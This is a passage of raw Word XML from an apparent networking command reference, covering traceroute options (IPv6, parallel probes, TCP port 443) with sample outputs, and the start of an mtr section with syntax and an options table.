          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[AS15169]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google's well-known AS number (15169)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47653698" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AS transition</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows where traffic moves between different network operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EC505F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network ownership</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reveals which organization controls each network segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D3F63F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP routing insight</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Helps understand internet backbone routing decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629AAF64" w14:textId="116F77ED" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>IPv6 traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63478DB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6 ipv6.google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15292E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9B948"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ipv6.google.com (2607:f8b0:4004:c1b::71), 30 hops max, 80 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5C465"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1  router.local (fe80::1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C03D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2  2001:db8::1 (2001:db8::1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD7029"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3  2607:f8b0:4004:c1b::71 (2607:f8b0:4004:c1b::71)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2488D1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1B569" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPv6 protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Uses traceroute6 command for IPv6 network tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B93DCF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2607:f8b0:4004:c1b::71</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google's IPv6 address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184FEAC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fe80::1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router's link-local IPv6 address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AE978" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2001:db8::1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP's IPv6 infrastructure address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B8A64" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80 byte packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Larger packet size due to IPv6 header overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28090A74" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPv6 path</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows complete IPv6 routing path to destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2BBCF" w14:textId="1A94C7B7" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Simultaneous probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BF2D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N 5 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF87F5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF8CD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lastRenderedPageBreak/>
        <w:t>traceroute to google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB990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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9A75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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76555E44"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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E3BB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4  google-peer.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116D2F2"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5  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A76F79" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C3B9E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-N 5 flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Sends 5 simultaneous probes per hop instead of sequential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837DAE3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Parallel probing reduces total trace time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D52309" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same accuracy</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Multiple probes still provide reliability measurements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADF1AE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrent testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Tests multiple paths simultaneously for better statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D58C8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Completes traceroute faster without losing detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3CFD0" w14:textId="35FA3FB6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Port-based trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A852A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p 443 -T google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76ABD3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAA67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ceroute to google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C17494"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A23EF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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255549B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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8D03C"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4  google-peer.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5982D7"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5  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD1AF2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFF692B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p 443 -T</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Traces route using TCP SYN packets to HTTPS port 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24725364" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Tests actual path that HTTPS traffic would take</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5E2B7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Port 443 often allowed through security devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040779F3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancer testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows how SSL/TLS traffic routes through infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE0F3C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Production realism</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Simulates actual application traffic routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB2DDD" w14:textId="3ED6A0F1" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>mtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B528C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>mtr</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command combines ping and traceroute functionality with continuous monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AA7D8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545BAED" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Network diagnostic tool that provides real-time path analysis with packet loss statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20C513" w14:textId="7743D2A0" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073565D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mtr [options] destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269086DB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3103"/>
        <w:gridCol w:w="3700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5FB0D7B5" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1192374F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31608A92" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1712B602" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E501E56"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r, --report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A88C15" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Report mode (non-interactive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1B4F17DC" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DD1CEE"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c, --report-cycles COUNT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14ABBBC4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Number of pings per hop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="72AEF004" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44531B9A"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s, --psize BYTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4356C421" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Packet size in bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5F4E9FD3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3AB4FA"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n, --no-dns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="333DA779" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Don't resolve hostnames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7C70BAB9" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66565DCE"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b, --show-ips</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A59A737" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Show IP numbers and host names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="637F038B" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BB851EE"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o, --order FIELDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392BE1B7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Select output fields and their order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="20BB4CD0" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AB7D213"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w, --report-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1902EFEE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Wide report format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="18C53BB8" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7E88C0"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i, --interval SECONDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5108A4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Interval between packets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7CB50923" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
